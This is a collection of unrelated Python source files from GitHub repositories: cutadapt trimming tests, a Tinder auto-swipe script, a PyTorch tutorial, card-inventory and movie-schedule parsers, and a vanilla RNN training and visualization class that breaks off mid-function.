assert a.random_match_probabilities(0.2) == [1, 0.4, 0.4*0.1, 0.4*0.1*0.4, 0.4*0.1*0.4*0.1]
```
#### File: keepadapt/tests/testtrim.py
```python
from __future__ import print_function, division, absolute_import
from cutadapt.seqio import ColorspaceSequence, Sequence
from cutadapt.adapters import Adapter, ColorspaceAdapter, PREFIX, BACK
from cutadapt.modifiers import AdapterCutter
def test_cs_5p():
read = ColorspaceSequence("name", "0123", "DEFG", "T")
adapter = ColorspaceAdapter("CG", PREFIX, 0.1)
cutter = AdapterCutter([adapter])
trimmed_read = cutter(read)
# no assertion here, just make sure the above code runs without
# an exception
def test_statistics():
read = Sequence('name', 'AAAACCCCAAAA')
adapters = [Adapter('CCCC', BACK, 0.1)]
cutter = AdapterCutter(adapters, times=3)
trimmed_read = cutter(read)
# TODO make this a lot simpler
trimmed_bp = 0
for adapter in adapters:
for d in (cutter.adapter_statistics[adapter].lengths_front, cutter.adapter_statistics[adapter].lengths_back):
trimmed_bp += sum(seqlen * count for (seqlen, count) in d.items())
assert trimmed_bp <= len(read), trimmed_bp
def test_end_trim_with_mismatch():
"""
Test the not-so-obvious case where an adapter of length 13 is trimmed from
the end of a sequence with overlap 9 and there is one deletion.
In this case the algorithm starts with 10 bases of the adapter to get
the hit and so the match is considered good. An insertion or substitution
at the same spot is not a match.
"""
adapter = Adapter('TCGATCGATCGAT', BACK, 0.1)
read = Sequence('foo1', 'AAAAAAAAAAATCGTCGATC')
cutter = AdapterCutter([adapter], times=1)
trimmed_read = cutter(read)
assert trimmed_read.sequence == 'AAAAAAAAAAA'
assert cutter.adapter_statistics[adapter].lengths_back == {9: 1}
# We see 1 error at length 9 even though the number of allowed mismatches at
# length 9 is 0.
assert cutter.adapter_statistics[adapter].errors_back[9][1] == 1
read = Sequence('foo2', 'AAAAAAAAAAATCGAACGA')
cutter = AdapterCutter([adapter], times=1)
trimmed_read = cutter(read)
assert trimmed_read.sequence == read.sequence
assert cutter.adapter_statistics[adapter].lengths_back == {}
``` |
{
"source": "JohnCullen543/TinderSwiper",
"score": 3
} |
#### File: JohnCullen543/TinderSwiper/TinderSwiperV.3.20190508.py
```python
import pyautogui as py
data = []
def locator():
test = 'TinderHeart.png'
cent = py.locateCenterOnScreen(test)
py.moveTo(cent[0:2])
py.click(button = 'left')
def Start():
start = input('')
if start:
locator()
SwipeRight(start)
else:
pass
def SwipeRight(start):
for x in range(101):
py.press('right', interval = .3)
Start()
``` |
{
"source": "johncurcio/facebook-secure-private-ai",
"score": 4
} |
#### File: facebook-secure-private-ai/lesson 2/02_stackemup.py
```python
import torch
def activation(x):
"""
Sigmoid activation function
Arguments
---------
x: torch.Tensor
"""
return 1/(1 + torch.exp(-x))
torch.manual_seed(7)  # rng seed for randn
features = torch.randn((1, 3))  # creates a random tensor of shape 1x3
n_input = features.shape[1]
n_hidden = 2
n_output = 1
# weights
W1 = torch.randn(n_input, n_hidden)
W2 = torch.randn(n_hidden, n_output)
# bias
B1 = torch.randn((1, n_hidden))
B2 = torch.randn((1, n_output))
# y = f(w*x + b)
# y = activation(weights*features + bias)
h = activation(torch.mm(features, W1) + B1)
y = activation(torch.mm(h, W2) + B2)
print(y)
``` |
{
"source": "johncurd91/deckbox",
"score": 4
} |
#### File: johncurd91/deckbox/deckbox.py
```python
import csv
# Search inventory for single card and count
def single_card_search():
with open('inventory.csv', 'r') as inventory_file:
csv_reader = csv.DictReader(inventory_file, delimiter=',')
user_input = input('Enter card name: ')
card_count = 0
for row in csv_reader:
if user_input == row['Name']:
card_count = int(row['Count'])
print(f'{card_count} cards named \'{user_input}\' found.')
# Search inventory using decklist for cards owned
def deck_list_search():
with open('inventory.csv', 'r') as inventory_file:
csv_reader = csv.DictReader(inventory_file, delimiter=',')
card_list = [row['Name'] for row in csv_reader]
with open('decklist.txt', 'r') as decklist_file:
decklist = decklist_file.readlines()
decklist_scrubbed = [i[2:].rstrip('\n') for i in decklist]
cards_owned = [card for card in decklist_scrubbed if card in card_list]
cards_not_owned = [card for card in decklist_scrubbed if card not in card_list]
print(f' Cards already owned: {cards_owned}')
print(f' Missing cards: {cards_not_owned}')
# Calculated total value of cards above minimum price
def total_value_min(conversion, min_price):
with open('inventory.csv', 'r') as inventory_file:
csv_reader = csv.DictReader(inventory_file, delimiter=',')
total_USD = 0
for row in csv_reader:
if float(row['Price'][1:]) * conversion >= min_price:
total_USD += (float(row['Price'][1:])) * int(row['Count'])
total_GBP = total_USD * conversion
print(f' Total value of cards above £{min_price}: £{round(total_GBP, 2)}')
total_value_min(0.81, 2)
``` |
{
"source": "johncylee/Moovee",
"score": 3
} |
#### File: ng_gh2014/data/moovee_parser.py
```python
import csv
import sys
import json
import datetime
def parse_txt(tsv_filename):
data = {}
data['items'] = []
key_list = []
with open(tsv_filename, 'r') as tsv:
for r_idx, row in enumerate(csv.reader(tsv, dialect='excel-tab')):
            if r_idx == 0:
key_list = row
else:
movie = {}
for c_idx, cell in enumerate(row):
movie[key_list[c_idx]] = cell
#print cell
data['items'].append(movie)
return data
def format_data(data):
for item in data['items']:
datetime_str = item['DATE'] + ' ' + item['TIME']
duration_mins = int(item['DURATION'])
start = datetime.datetime.strptime(datetime_str, '%Y/%m/%d %H:%M')
end = start + datetime.timedelta(0, 0, 0, 0, duration_mins)
item['START_DATETIME'] = start.isoformat()
item['END_DATETIME'] = end.isoformat()
return data
def main():
    data = parse_txt(sys.argv[1])
    formatted = format_data(data)
    print(json.dumps(formatted, indent=2, ensure_ascii=False))
if __name__ == '__main__':
if len(sys.argv) > 1:
main()
else:
        print('')
        print('\tpython ' + sys.argv[0] + ' <FILENAME>')
``` |
{
"source": "johndah/Visualization-of-Recurrent-Neural-Networks",
"score": 2
} |
#### File: Visualization-of-Recurrent-Neural-Networks/Vanilla RNN/VisualizationOfRNN.py
```python
from __future__ import print_function
import sklearn.preprocessing
from numpy import *
from copy import *
import warnings
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter, MaxNLocator
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.offsetbox import AnchoredText
import platform
from sty import bg, RgbBg
from gensim.models import KeyedVectors
import ctypes
import re
import zipfile
import lxml.etree
from terminaltables import SingleTable
import time
import datetime
import os
import pickle
from decimal import Decimal
class VisualizeRNN(object):
def __init__(self, attributes=None):
if not attributes:
raise Exception('Dictionary argument "attributes" is required.')
self.__dict__ = attributes
# Allowing ANSI Escape Sequences for colors
if platform.system().lower() == 'windows':
stdout_handle = ctypes.windll.kernel32.GetStdHandle(ctypes.c_int(-11))
mode = ctypes.c_int(0)
ctypes.windll.kernel32.GetConsoleMode(ctypes.c_int(stdout_handle), ctypes.byref(mode))
mode = ctypes.c_int(mode.value | 4)
ctypes.windll.kernel32.SetConsoleMode(ctypes.c_int(stdout_handle), mode)
if self.word_domain:
if self.save_sentences:
self.vocabulary, self.sentences, self.K = self.load_vocabulary()
with open('./Data/vocabulary.word2VecKeyedVector', 'wb') as file:
pickle.dump(self.vocabulary, file)
with open('./Data/sentences.list', 'wb') as file:
pickle.dump(self.sentences, file)
with open('./Data/K.int', 'wb') as file:
pickle.dump(self.K, file)
elif self.load_sentences:
with open('./Data/vocabulary.word2VecKeyedVector', 'rb') as file:
self.word2vec_model = pickle.load(file)
with open('./Data/sentences.list', 'rb') as file:
self.sentences = pickle.load(file)
with open('./Data/K.int', 'rb') as file:
self.K = pickle.load(file)
else:
self.word2vec_model, input_sequence, self.K = self.load_vocabulary()
else:
input_sequence, self.char_to_ind, self.ind_to_char = self.load_characters()
self.K = len(self.ind_to_char)
if self.n_hidden_neurons == 'Auto':
self.n_hidden_neurons = self.K
n_validation = int(len(input_sequence) * self.validation_proportion)
n_training = len(input_sequence) - n_validation
input_sequence = input_sequence[:int(self.corpus_proportion*len(input_sequence))]
self.input_sequence = input_sequence[:n_training]
self.input_sequence_validation = input_sequence[n_training:]
self.weights = ['W', 'V', 'U', 'b', 'c']
self.gradients = ['dLdW', 'dLdV', 'dLdU', 'dLdB', 'dLdC']
self.num_gradients = ['gradWnum', 'gradVnum', 'gradUnum', 'gradBnum', 'gradCnum']
self.sizes = [(self.n_hidden_neurons, self.n_hidden_neurons), (self.K, self.n_hidden_neurons), \
(self.n_hidden_neurons, self.K), (self.n_hidden_neurons, 1), (self.K, 1)]
self.init_epoch = 0
self.init_iteration = 0
# Weight initialization
if self.weight_init == 'Load':
print('Loading weights...')
else:
print('Initializing weights...')
for weight, grad_index in zip(self.weights, range(len(self.gradients))):
if self.sizes[grad_index][1] > 1:
if self.weight_init == 'Load':
self.init_sigma = loadtxt(self.model_directory + 'initSigma.txt', unpack=False)
setattr(self, weight, array(loadtxt(self.model_directory + 'Weights/' + weight + ".txt", comments="#", delimiter=",", unpack=False)))
else:
if self.weight_init == 'He':
self.init_sigma = sqrt(2 / sum(self.sizes[grad_index]))
else:
self.init_sigma = 0.01
setattr(self, weight, self.init_sigma*random.randn(self.sizes[grad_index][0], self.sizes[grad_index][1]))
else:
if self.weight_init == 'Load':
self.init_sigma = loadtxt(self.model_directory + 'initSigma.txt', unpack=False)
setattr(self, weight, array([loadtxt(self.model_directory + 'Weights/' + weight + ".txt", comments="#", delimiter=",", unpack=False)]).T)
else:
setattr(self, weight, zeros(self.sizes[grad_index]))
if self.weight_init == 'Load':
self.seq_iterations = loadtxt(self.model_directory + 'seqIterations.txt', delimiter=",", unpack=False)
self.smooth_losses = loadtxt(self.model_directory + 'smoothLosses.txt', delimiter=",", unpack=False)
self.validation_losses = loadtxt(self.model_directory + 'validationLosses.txt', delimiter=",", unpack=False)
self.init_epoch = int(self.model_directory.split('epoch')[1][0])
self.init_iteration = 0 # int(self.model_directory.split('iteration')[1].split('-')[0])
self.n_hidden_neurons = int(self.model_directory.split('neurons')[1][:3])
self.eta = float(self.model_directory.split('eta-')[1][:7])
self.x0 = ' '
self.h0 = zeros((self.n_hidden_neurons, 1))
self.loss_momentum = 1e-3
def load_characters(self):
print('Loading text file "' + self.text_file + '"...')
if self.text_file[-4:] == '.zip':
with zipfile.ZipFile(self.text_file, 'r') as z:
doc = lxml.etree.parse(z.open('ted_en-20160408.xml', 'r'))
print('Extracting characters...')
input_text = '\n'.join(doc.xpath('//content/text()'))
characters = []
[characters.append(char) for sentences in input_text for char in sentences if char not in characters]
print('Unique characters:\n' + str(characters))
k = len(characters)
indicators = array(range(k))
ind_one_hot = self.to_one_hot(indicators)
char_to_ind = dict((characters[i], array(ind_one_hot[i])) for i in range(k))
ind_to_char = dict((indicators[i], characters[i]) for i in range(k))
return input_text, char_to_ind, ind_to_char
def load_vocabulary(self):
self.model_file = 'Data/glove_840B_300d.txt' # Word tokenization text
is_binary = self.model_file[-4:] == '.bin'
print('Loading model "' + self.model_file + '"...')
word2vec_model = KeyedVectors.load_word2vec_format(self.model_file, binary=is_binary)
K = size(word2vec_model.vectors, 1)
words = []
print('Loading text file "' + self.text_file + '"...')
if self.text_file[-4:] == '.zip':
with zipfile.ZipFile(self.text_file, 'r') as z:
doc = lxml.etree.parse(z.open(z.filelist[0].filename, 'r'))
print('Extracting words...')
input_text = '\n'.join(doc.xpath('//content/text()'))
words.extend(re.findall(r"\w+|[^\w]", input_text))
else:
with open(self.text_file, 'r') as f:
lines = f.readlines()
print('Extracting words...')
for line in lines:
words.extend(re.findall(r"\w+|[^\w]", line))
words.append('\n')
return word2vec_model, words, K
def get_words(self, e):
x_sequence = self.input_sequence[e:e + self.seq_length]
y_sequence = self.input_sequence[e + 1:e + self.seq_length + 1]
x = []
y = []
for i in range(len(x_sequence)):
x_word = x_sequence[i]
y_word = y_sequence[i]
try:
x.append(array([self.word2vec_model[x_word]]).T)
except KeyError:
self.word2vec_model[x_word] = random.uniform(-0.25, 0.25, self.K)
x.append(array([self.word2vec_model[x_word]]).T)
print("Word '" + x_word + "'" + ' added to model.')
try:
y.append(array([self.word2vec_model[y_word]]).T)
except KeyError:
self.word2vec_model[y_word] = random.uniform(-0.25, 0.25, self.K)
y.append(array([self.word2vec_model[y_word]]).T)
return x_sequence, y_sequence, x, y
def get_characters(self, e, input_sequence, seq_length=None):
if not seq_length:
seq_length = self.seq_length
x_sequence = input_sequence[e:e+seq_length]
y_sequence = input_sequence[e+1:e+seq_length + 1]
x = self.seq_to_one_hot(x_sequence)
y = self.seq_to_one_hot(y_sequence)
return x_sequence, y_sequence, x, y
def run_vanilla_rnn(self):
if self.weight_init == 'Load':
smooth_loss = self.smooth_losses[-1]
validation_loss = self.validation_losses[-1]
lowest_validation_loss = validation_loss
else:
smooth_loss = None
if self.word_domain:
self.domain_specification = 'Words'
else:
self.domain_specification = 'Characters'
constants = 'Max Epochs: ' + str(self.n_epochs) + ' (' + str(len(self.input_sequence)/self.seq_length * self.n_epochs) + ' seq. iter.)' \
+ '\n# Hidden neurons: ' + str(self.n_hidden_neurons) \
+ '\nWeight initialization: ' + str(self.weight_init) \
+ '\n' + r'$\sigma$ = ' + "{:.2e}".format(self.init_sigma) \
+ '\n' + r'$\eta$ = ' + "{:.2e}".format(self.eta) \
+ '\n' + 'Sequence length: ' + str(self.seq_length) \
+ '\n#' + self.domain_specification + ' in training text:' + '\n' + str(len(self.input_sequence)) \
+ '\n' + 'AdaGrad: ' + str(self.ada_grad_sgd) \
+ '\n' + 'RMS Prop: ' + str(self.rms_prop)
if self.rms_prop:
constants += '\n' + r'$\gamma$ = ' + "{:.2e}".format(self.gamma)
m = []
for weight in self.weights:
m.append(zeros(getattr(self, weight).shape))
if self.weight_init == 'Load':
seq_iteration = self.seq_iterations[-1]
seq_iterations = [s for s in self.seq_iterations]
smooth_losses = [s for s in self.smooth_losses]
validation_losses = [s for s in self.validation_losses]
else:
seq_iteration = 0
seq_iterations = []
smooth_losses = []
validation_losses = []
smooth_losses_temp = []
validation_losses_temp = []
seq_iterations_temp = []
start_time = time.time()
previous_time = start_time
for epoch in range(self.init_epoch, self.n_epochs):
h_prev = deepcopy(self.h0)
for e in range(self.init_iteration, len(self.input_sequence)-self.seq_length-1, self.seq_length):
if self.word_domain:
x_sequence, y_sequence, x, y = self.get_words(e)
else:
x_sequence, y_sequence, x, y = self.get_characters(e, self.input_sequence)
output, h, a = self.forward_prop(x, h_prev)
if (self.train_model):
self.back_prop(x, y, output, h)
loss, accuracy = self.compute_loss(output, y)
if not smooth_loss:
smooth_loss = loss
smooth_loss = (1 - self.loss_momentum) * smooth_loss + self.loss_momentum * loss
if (not self.train_model) or time.time() - previous_time > 900 or (time.time() - start_time < 5 and time.time() - previous_time > 3) or e >= len(self.input_sequence)-2*self.seq_length-1:
print("Evaluating and presenting current model..")
seq_iterations_temp.append(seq_iteration)
smooth_losses_temp.append(smooth_loss)
x0 = self.input_sequence[e]
if self.word_domain:
x_sequence, y_sequence, x, y = self.get_words(e)
else:
x_sequence, y_sequence, x, y = self.get_characters(0, self.input_sequence_validation, self.length_synthesized_text)
output, h, a = self.forward_prop(x, h_prev)
validation_loss, accuracy = self.compute_loss(output, y)
lowest_validation_loss = copy(validation_loss)
validation_losses_temp.append(validation_loss)
table, neuron_activation_map, inputs = self.synthesize_text(x0, h_prev, self.length_synthesized_text)
with open('PlotConfigurations.txt', 'r') as f:
lines = f.readlines()
for line in lines:
line = line.split('#')[0]
if 'plot_process:' in line:
self.plot_process = ''.join(line.split()).split(':')[1] == 'True'
elif 'plot_color_map:' in line:
self.plot_color_map = ''.join(line.split()).split(':')[1] == 'True'
elif 'plot_fft:' in line:
self.plot_fft = ''.join(line.split()).split(':')[1] == 'True'
elif 'auto_detect_peak:' in line:
self.auto_detect_peak = line.split("'")[1]
if self.plot_color_map:
self.plot_neural_activity(inputs, neuron_activation_map)
if self.plot_fft:
self.plot_fft_neural_activity(neuron_activation_map)
time_passed = time.time() - start_time
estimated_total_time = time_passed/(max(e, 1)/len(self.input_sequence))
remaining_time = estimated_total_time - time_passed
previous_time = time.time()
print('\nSequence iteration: ' + str(seq_iteration) + ', Epoch: ' + str(epoch)
+ ', Epoch ETA: ' + str(datetime.timedelta(seconds=int(remaining_time)))
+ ', Epoch process: ' + str('{0:.2f}'.format(e/len(self.input_sequence)*100)) + '%'
+ ', Training loss: ' + str('{0:.2f}'.format(smooth_loss)) + ', Neuron of interest: '
+ ', Validation loss: ' + str('{0:.2f}'.format(validation_loss)) + ', Neuron of interest: ' +
str(self.neurons_of_interest) + '(/' + str(self.n_hidden_neurons) + ')')
print(table)
if self.plot_process:
fig = plt.figure(3)
plt.clf()
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.85)
anchored_text = AnchoredText(constants, loc=1)
ax.add_artist(anchored_text)
plt.title(self.domain_specification[:-1] + ' prediction learning curve of Recurrent Neural Network')
plt.ylabel('Smooth loss')
plt.xlabel('Sequence iteration')
                        plt.plot(seq_iterations+seq_iterations_temp, smooth_losses+smooth_losses_temp, linewidth=2, label='Training')
                        plt.plot(seq_iterations+seq_iterations_temp, validation_losses+validation_losses_temp, linewidth=2, label='Validation')
plt.grid()
plt.legend(loc='upper left')
plt.pause(.5)
if not self.train_model:
input("\nPress Enter to continue...")
else:
if validation_loss <= lowest_validation_loss:
seq_iterations += seq_iterations_temp
smooth_losses += smooth_losses_temp
validation_losses += validation_losses_temp
smooth_losses_temp = []
validation_losses_temp = []
seq_iterations_temp = []
lowest_validation_loss = copy(smooth_loss)
h_prev_best = copy(h_prev)
if self.train_model and self.save_parameters:
state = "val_loss%.3f-val_acc%.3f-loss%.3f-epoch%d-iteration%d-neurons%d-eta-"%(validation_loss, accuracy, loss, epoch, int(e/self.seq_length), self.n_hidden_neurons) + '{:.2e}'.format(Decimal(self.eta)) + "/"
try:
for weight in self.weights:
file_name = 'Vanilla RNN Saved Models/' + state + 'Weights/' + weight + '.txt'
os.makedirs(os.path.dirname(file_name), exist_ok=True)
savetxt(file_name, getattr(self, weight), delimiter=',')
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'init_sigma.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'init_sigma.txt', array([[self.init_sigma]]))
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'seq_iterations.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'seq_iterations.txt', seq_iterations, delimiter=',')
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'smooth_losses.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'smooth_losses.txt', smooth_losses, delimiter=',')
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'validation_losses.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'validation_losses.txt', validation_losses, delimiter=',')
except Exception as ex:
print(ex)
print('Continuing training...')
if self.train_model:
epsilon = 1e-10
if self.rms_prop:
c_m = self.gamma
c_g = 1 - self.gamma
else:
c_m, c_g, = 1, 1
for grad, weight, grad_index in zip(self.gradients, self.weights, range(len(self.gradients))):
if self.ada_grad_sgd:
m[grad_index] = c_m * m[grad_index] + c_g*getattr(self, grad)**2
sqrt_inv_m = (m[grad_index]+epsilon)**-0.5
updated_weight = getattr(self, weight) - self.eta * multiply(sqrt_inv_m, getattr(self, grad))
else:
updated_weight = deepcopy(getattr(self, weight)) - self.eta * deepcopy(getattr(self, grad))
setattr(self, weight, updated_weight)
h_prev = deepcopy(h[-1])
seq_iteration += 1
def plot_neural_activity(self, inputs, neuron_activation_map):
with open('FeaturesOfInterest.txt', 'r') as f:
lines = f.readlines()
for line in lines:
line = line.split('#')[0]
if 'Prediction features:' in line:
feature = line.split(':')[1].split("'")[1]
break
try:
input_indices_of_interest = []
inputs_of_interest = []
for i in range(len(inputs)):
if bool(re.fullmatch(r''.join(feature), inputs[i])):
input_indices_of_interest.append(i)
if inputs[i] == '\n':
inputs[i] = '\\n'
inputs_of_interest.append('"' + inputs[i] + '"')
except Exception as ex:
print(ex)
if len(inputs_of_interest) > 20:
inputs_of_interest = [' ']*len(inputs_of_interest)
elif len(input_indices_of_interest) < 1:
warnings.warn('The feature of interest is not found in generated sequence')
            return False
f, axarr = plt.subplots(1, 2, num=1, gridspec_kw={'width_ratios': [5, 1]}, clear=True)
axarr[0].set_title('Colormap of hidden neuron activations')
feature_label = 'Feature: "' + feature + '"'
if not self.word_domain and feature == '.':
feature_label = 'Feature: ' + '$\it{Any}$'
x = range(len(inputs_of_interest))
axarr[0].set_xticks(x)
axarr[0].set_xlabel('Predicted sequence (' + feature_label + ')')
axarr[0].set_xticklabels(inputs_of_interest, fontsize=7, rotation=90 * self.word_domain)
axarr[1].set_xticks([])
if self.auto_detect_peak == 'Relevance':
neuron_activation_rows = neuron_activation_map
else:
neuron_activation_rows = neuron_activation_map[self.neurons_of_interest_plot, :]
max_activation = amax(neuron_activation_map)
min_activation = amin(neuron_activation_map)
input_indices_of_interest_conjugate = list(set(range(len(inputs))) - set(input_indices_of_interest))
neuron_feature_extracted_map = flip(neuron_activation_rows[:, input_indices_of_interest], axis=0)
neuron_feature_remaining_map = flip(neuron_activation_rows[:, input_indices_of_interest_conjugate], axis=0)
before_action_potential = array(input_indices_of_interest) - 1
after_action_potential = array(input_indices_of_interest) + 1
before_action_potential[array(input_indices_of_interest) - 1 == -1] = 1
after_action_potential[array(input_indices_of_interest) + 1 == size(neuron_activation_rows, 1)] = size(
neuron_activation_rows, 1) - 2
prominences = 2 * neuron_activation_rows[:, input_indices_of_interest] - neuron_activation_rows[:, before_action_potential] - neuron_activation_rows[:,after_action_potential]
prominence = atleast_2d(mean(abs(prominences), axis=1)).T
extracted_mean = array([mean(neuron_feature_extracted_map, axis=1)]).T
remaining_mean = array([mean(neuron_feature_remaining_map, axis=1)]).T
difference = atleast_2d(mean(abs(extracted_mean - remaining_mean), axis=1)).T
score = prominence + difference
relevance = score / amax(score)
if self.auto_detect_peak == 'Relevance':
reduced_window_size = 10
argmax_row = where(relevance == amax(relevance))[0][0]
neuron_window = [0]*2
neuron_window[0] = max(argmax_row - int(reduced_window_size / 2), 0)
neuron_window[1] = min(argmax_row + int(reduced_window_size / 2 + 1), size(relevance, 0))
relevance = relevance[neuron_window[0]:neuron_window[1], :]
neurons_of_interest_relevance = range(neuron_window[0], neuron_window[1])
print('\nAuto-detected relevance peak for feature "' + feature + '":')
print('Neuron: ' + str(argmax_row))
print('Value: ' + str(amax(relevance)) + '\n')
neuron_activation_rows = neuron_activation_map[neurons_of_interest_relevance, :]
neuron_feature_extracted_map = flip(neuron_activation_rows[:, input_indices_of_interest], axis=0)
self.intervals_to_plot = []
self.interval_limits = []
interval = [str(neuron_window[0]), str(neuron_window[1])]
interval[0] = str(max(int(interval[0]), 0))
interval[-1] = str(min(int(interval[-1]), self.K - 1))
self.neurons_of_interest_plot.extend(range(int(interval[0]), int(interval[-1]) + 1))
self.neurons_of_interest_plot_intervals.append(range(int(interval[0]), int(interval[-1]) + 1))
intermediate_range = [i for i in range(int(interval[0]) + 1, int(interval[-1]))]
intermediate_range.insert(0, int(interval[0]))
intermediate_range.append(int(interval[-1]))
intermediate_range_str = [str(i) for i in intermediate_range]
intermediate_range_str[-1] += self.interval_label_shift
self.intervals_to_plot.extend(intermediate_range_str)
self.interval_limits.extend(intermediate_range)
self.interval_limits = array(self.interval_limits)
self.neurons_of_interest_plot = range(neuron_window[0], neuron_window[1])
y = range(len(self.neurons_of_interest_plot))
intervals = [
self.intervals_to_plot[where(self.interval_limits == i)[0][0]] if i in self.interval_limits else ' ' for i
in self.neurons_of_interest_plot]
for i in range(len(axarr)):
axarr[i].set_yticks(y)
axarr[i].set_yticklabels(flip(intervals), fontsize=7)
axarr[0].set_ylabel('Neuron')
colmap = axarr[0].imshow(neuron_feature_extracted_map, cmap='coolwarm', interpolation='nearest', aspect='auto',
vmin=min_activation, vmax=max_activation)
colmap = axarr[1].imshow(relevance,
cmap='coolwarm', interpolation='nearest', aspect='auto', vmin=min_activation, vmax=max_activation)
axarr[1].set_title('Relevance')
if self.auto_detect_peak != 'Relevance':
interval = 0
for i in range(len(self.neurons_of_interest_plot_intervals) + 1):
if i > 0:
limit = self.neurons_of_interest_plot_intervals[i - 1]
interval += 1 + limit[-1] - limit[0]
axarr[0].plot(arange(-.5, len(input_indices_of_interest) + .5),
                          (len(input_indices_of_interest) + 1) * [interval - 0.5], 'k--', linewidth=1)
f.colorbar(colmap, ax=axarr.ravel().tolist())
plt.pause(.1)
return True
def plot_fft_neural_activity(self, neuron_activation_map):
neurons_of_interest_fft = range(16, 21)
if self.auto_detect_peak != 'FFT':
neuron_activations = neuron_activation_map[neurons_of_interest_fft, :]
else:
neuron_activations = neuron_activation_map
fft_neuron_activations_complex = fft.fft(neuron_activations)
fft_neuron_activations_abs = abs(fft_neuron_activations_complex / self.length_synthesized_text)
fft_neuron_activations_single_sided = fft_neuron_activations_abs[:, 0:int(self.length_synthesized_text / 2)]
fft_neuron_activations_single_sided[:, 2:-2] = 2 * fft_neuron_activations_single_sided[:, 2:-2]
freq = arange(0, floor(self.length_synthesized_text / 2)) / self.length_synthesized_text
if self.auto_detect_peak == 'FFT':
self.band_width = [0.1, 0.4]
start_neuron_index = 0
neuron_window = [start_neuron_index] * 2
reduced_window_size = 10
domain_relevant_freq = (freq > self.band_width[0]) & (freq < self.band_width[1])
# freq = freq[domain_relevant_freq]
domain_relevant_components = fft_neuron_activations_single_sided[:, domain_relevant_freq]
argmax_row = where(fft_neuron_activations_single_sided == amax(domain_relevant_components))[0][0]
neuron_window[0] += max(argmax_row - int(reduced_window_size / 2), 0)
neuron_window[1] += min(argmax_row + int(reduced_window_size / 2 + 1), size(domain_relevant_components, 0))
fft_neuron_activations_single_sided = fft_neuron_activations_single_sided[
neuron_window[0] - start_neuron_index:neuron_window[
1] - start_neuron_index, :]
neurons_of_interest_fft = range(neuron_window[0], neuron_window[1])
print('\nAuto-detected FFT periodicity peak in band width interval ' + str(self.band_width) + ':')
print('Neuron: ' + str(argmax_row))
print('Value: ' + str(amax(domain_relevant_components)) + '\n')
neurons_of_interest_fft, freq = meshgrid(neurons_of_interest_fft, freq)
fig = plt.figure(2)
plt.clf()
ax = fig.gca(projection='3d')
ax.view_init(20, -120)
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
cmap_color = cm.coolwarm # cm.coolwarm
surf = ax.plot_surface(freq, neurons_of_interest_fft, fft_neuron_activations_single_sided.T, rstride=1,
cstride=1, cmap=cmap_color, linewidth=0,
antialiased=False)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.zaxis.set_rotate_label(False)
plt.title('Fourier Amplitude Spectrum of Neuron Activation')
plt.xlabel('Frequency')
plt.ylabel('Neurons of interest')
ax.set_zlabel(r'$|\mathcal{F}|$')
plt.pause(.5)
def forward_prop(self, x, h_prev, weights={}):
if not weights:
weights_tuples = [(self.weights[i], getattr(self, self.weights[i])) for i in range(len(self.weights))]
weights = dict(weights_tuples)
tau = len(x)
h = [h_prev]
a = []
o = []
if not self.word_domain:
p = []
for t in range(0, tau):
a.append(dot(weights['W'], h[t]) + dot(weights['U'], x[t]) + weights['b'])
h.append(self.tanh(a[t]))
if self.word_domain:
o.append(dot(weights['V'], h[t+1]) + weights['c'])
else:
o = dot(weights['V'], h[t+1]) + weights['c']
p.append(self.softmax(o))
if self.word_domain:
return o, h, a
else:
return p, h, a
def synthesize_text(self, x0, h_prev, seq_length, weights={}):
if not weights:
weights_tuples = [(self.weights[i], getattr(self, self.weights[i])) for i in range(len(self.weights))]
weights = dict(weights_tuples)
self.neurons_of_interest = []
self.neurons_of_interest_plot = []
self.neurons_of_interest_plot_intervals = []
self.load_neuron_intervals()
print('Predicting sentence from previous ' + self.domain_specification[:-1].lower() + ' "' + x0 + '"')
table_data = [['Neuron ' + str(self.neurons_of_interest[int(i/2)]), ''] if i % 2 == 0 else ['\n', '\n'] for i in range(2*len(self.neurons_of_interest))]
table = SingleTable(table_data)
table.table_data.insert(0, ['Neuron ', 'Predicted sentence'])
max_width = table.column_max_width(1)
y_n = [[] for i in range(len(self.neurons_of_interest))]
y = [[] for i in range(len(self.neurons_of_interest))]
if self.word_domain:
x = [array([self.word2vec_model[x0]]).T]
else:
sample = copy(x0)
neuron_activation_map = zeros((self.n_hidden_neurons, seq_length))
for t in range(seq_length):
if not self.word_domain:
x = self.seq_to_one_hot(sample)
output, h, a = self.forward_prop(x, h_prev, weights)
h_prev = deepcopy(h[-1])
neuron_activation_map[:, t] = a[-1][:, 0]
neuron_activations = a[-1][self.neurons_of_interest]
if self.word_domain:
output_word_vector = output[0][:, 0]
list_most_similar = self.word2vec_model.most_similar(positive=[output_word_vector], topn=200)
similarities = array([list_most_similar[i][1] for i in range(len(list_most_similar))])
p = similarities[similarities > 0]/sum(similarities[similarities > 0])
else:
p = output[-1]
cp = cumsum(p)
rand = random.uniform()
diff = cp - rand
sample_index = [i for i in range(len(diff)) if diff[i] > 0]
if sample_index:
sample_index = sample_index[0]
else:
sample_index = len(diff) - 1
if self.word_domain:
sample = list_most_similar[sample_index][0]
else:
sample = self.ind_to_char.get(sample_index)
for i in range(len(self.neurons_of_interest)):
neuron_activation = nan_to_num(neuron_activations[i, 0])/20.0
active_color = abs(int(neuron_activation * 255)) if self.dark_theme else 255
inactive_color = 0 if self.dark_theme else 255 - abs(int(neuron_activation * 255))
if neuron_activation > 0:
red = active_color
green = inactive_color
blue = inactive_color
else:
red = inactive_color
green = inactive_color
blue = active_color
bg.set_style('activationColor', RgbBg(red, green, blue))
colored_word = bg.activationColor + sample + bg.rs
y_n[i].append(sample)
y[i].append(colored_word)
for i in range(len(self.neurons_of_interest)):
wrapped_string = ''
line_width = 0
for j in range(len(y[i])):
